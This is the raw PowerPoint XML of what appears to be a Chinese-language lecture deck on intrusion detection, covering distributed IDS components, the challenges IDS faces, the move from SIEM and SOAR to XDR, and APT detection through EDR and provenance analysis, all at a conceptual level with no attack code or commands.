        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30740921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如图是分布式入侵检测的结构示意图，主要包括：</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、数据采集构件；</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、通信传输构件：</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、入侵检测分析构件；</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、应急处理构件；</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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、用户管理构件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和安全知识库。</a:t>
            </a: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其中，</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、数据采集构件主要负责收集检测使用的数据，包括主机数据和网络数据两个方面；</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、通信传输构件主要负责传递、加工原始数据；</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、入侵检测分析构件主要负责采用各种检测算法对采集到的数据进行分析，产生检测结果；</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、应急处理构件按照入侵检测的结果对入侵行为进行响应；</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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、用户管理构件则主要负责构件配置，提供管理接口，产生入侵检测总体报告等。</a:t>
            </a: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448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134735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其中，</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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、数据采集构件主要负责收集检测使用的数据，包括主机数据和网络数据两个方面；</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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、通信传输构件主要负责传递、加工原始数据；</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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、入侵检测分析构件主要负责采用各种检测算法对采集到的数据进行分析，产生检测结果；</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4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、应急处理构件按照入侵检测的结果对入侵行为进行响应；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、用户管理构件则主要负责构件配置，提供管理接口，产生入侵检测总体报告等。</a:t>
            </a:r>
          </a:p>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6073697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2750802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448C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29209982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eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>随着能力的提高，入侵者会研制更多的攻击工具，以及使用更为复杂精致的攻击手段，对更大范围的目标类型实施攻击；</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(2)</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入侵者采用加密手段传输攻击信息；</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(3)</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日益增长的网络流量导致检测分析难度加大；</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(4)</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不适当的自动响应机制存在着巨大的安全风险；</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(5)</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存在对入侵检测系统自身的攻击；</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(6)</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过高的错报率和误报率，导致很难确定真正的入侵行为；</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(7)</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采用交换方法限制了网络数据的可见性；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>高速网络环境导致很难对所有数据进行高效实时分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1713971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2973210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altLang="en-US"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3234198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143802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入侵检测技术的实质是一种网络入侵识别技术。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测是对企图入侵、正在进行的入侵或已经发生的入侵行为进行识别的过程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在网络入侵行为的准备阶段，它能够识别网络入侵的企图，以预防入侵行为的发生；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当然也能够识别正在发生的网络入侵行为，采取必要的措施帮助系统进行反制，以减轻入侵行为对系统造成的损失；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>同时，入侵检测也能够在网络入侵发生后进行分析，以帮助管理员弄清网络入侵的基本原理和路线，调整网络安全策略，避免系统再次遭受同类型的网络入侵。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因此，入侵检测系统往往被称为防火墙之后的第一道网络安全闸门。</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36907858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42496103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14112327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432321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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="736113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早在 1990 年代，有远见的机构就认识到他们需要将不同源的安全日志整合到一个系统中，以便分析和满足合规性要求。</a:t>
            </a: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有近二十年的时间，安全信息和事件管理 (SIEM) 平台是唯一可以帮助安全团队集检测、调查和响应为一体的解决方案。</a:t>
            </a:r>
          </a:p>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不幸的是，随着时间的推移，SIEM 面临着一系列挑战。虽然SIEM曾经足够好了，但它们在预防、检测和响应不断增长的攻击面的威胁方面不再那么有效。此外，SIEM工具以价格昂贵、部署具有挑战性以及操作和维护繁琐而著称。</a:t>
            </a:r>
          </a:p>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后来，许多机构在SIEM的基础之上，通过安全编排、自动化和响应 (SOAR -Security Orchestration, Automation and Response) 解决方案聚合来自端点、电子邮件、云和其他系统的警报以提升其能力。SOAR解决方案支持自动化、编排和其他分析工具，从而可以集中管理与潜在威胁相关的关键信息。但SOAR也伴随着高成本和复杂性，需要一个很成熟的安全运营中心 (SOC) 来实施并维护其与合作伙伴的集成和剧本。</a:t>
            </a:r>
          </a:p>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SIEM和SOAR等解决方案在当今的网络安全环境中已达到其极限，在预防、检测和响应不断增长的攻击面的威胁方面不再有效。因此，机构正在转向扩展检测和响应 (XDR) ，以统一整个企业的威胁检测和响应。</a:t>
            </a:r>
          </a:p>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XDR提供了一种攻击的检测模型，横跨各种端点、网络、SaaS应用、云基础设施等各种可以处理的网络资源，为所有的网络层和应用程序堆践提供可见性，同时具备高级检测、自动关联和机器学习能力，可以快速发现事件，响应并阻止现有威胁和紧急威胁。除此之外，XDR还可有效降低长期折磨安全人员的大量警告噪音。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传统安全工具和解决方案之间缺乏联系，事件分类和调查过程存在孤岛问题，导致大多数安全分析人员的事件关联和攻击观点存在局限性。另外一个最大问题是告警疲劳问题。传统方案和策略会生成大量缺少有上下文信息的告警。这些不完整的、缺乏有效信息的安全告警往往伴随着的是较高的误报率，对安全运营人员来说意义不大，而真正的告警可能会会忽视或丢失。XDR通过集中、规范化和关联来自多个来源的安全数据来帮助安全团队解决这些问题。XDR通过全面的整体检测和响应策略消除了安全孤岛。它收集信息并匹配许多安全层(包括为端点、服务器、电子邮件、云和工作负载配置的安全层)上的深度活动数据的关系。</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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> SIEM 系统仅从网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>火墙， 入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统 （IDS），防病毒软件和入侵防御系统（IPS）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等设备收集数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 但是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还包括</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来自 HR 或会计系统等其他应用程序的数据日志； 社交媒体活动； 移动设备; 远程服务器甚至本地服务器——您可以通过将这些不同的来源实时捆绑在一起，更深入地了解黑客如何获得访问权限和渗透网络。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XDR</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>除了提供更高的可见性以一次检测多个维度的威胁并根据分析期间识别的事件创建自动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>告警</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之外， 还提供每个事件的上下文，因此不仅可以看到发生了什么，还可以看到它发生的原因——所以下次类似的事情再次出现时，每个人都会确切地知道如何最好地做出反应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> XDR 提供比 SIEM 更丰富的威胁可见性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</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XDR 对 AI 和机器学习的应用使其具有强大的算法分析能力，精准的检测攻击。从行为检测和警报到调查和修正，XDR 使用 AI 来检测存在威胁的行为，并自动响应和缓解可能的功能。借助机器学习。</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en-US" altLang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XDR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全检测能力主要要素包括算法和数据两个部分，二者相辅相成。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下面以终端检测与响应为例，展开介绍</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随着网络攻防对抗技术发展和外部环境变化，高级持续性威胁（Advanced Persistent Threat）APT攻击逐步成为网络空间博弈重要手段，给国家、社会和人民带来严重危害。</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当前主流的APT攻击检测主要依赖于传统的IDPS（Intrusion Detection and Prevention Systems）入侵检测防御系统和EDR（Endpoint Detection and Response）终端检测与响应系统中专家先验知识定义的规则。然而，APT攻击中大量使用的高级且不断演进的攻击技术，例如0-day漏洞、无文件攻击和白文件黑利用（living off the land）等，使得APT攻击链极具隐蔽性。由于缺乏上下文溯源分析能力，传统的IDPS、EDR等检测工具中的规则无法精准的刻画这些隐蔽攻击特征，导致APT攻击检测误报、漏报较高。</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n>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>APT识别/跟踪，攻击溯源，威胁狩猎与响应，团伙分析，态势感知等安全防御目标已经远远超出了传统孤立检测系统的应用范畴。应用日志、主机日志、网络日志、检测事件日志、资产信息、评估结果及业务层面的员工信息等数据，已经逐渐融入SIEM和UEBA方案，同时，威胁情报信息也逐渐成为检测能力的标配。多源异构数据的接入和关联，为事件的可视化、检测、推理、响应和治理提供了全面的支撑。随着数据的丰富和检测、关联能力的提升、响应能力更自动化，各大厂商也逐渐开始思考智慧安全能力的构建，以针对安全数据实现更通用的自动化推理能力。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="000099"/>
              </a:buClr>
              <a:buSzTx/>
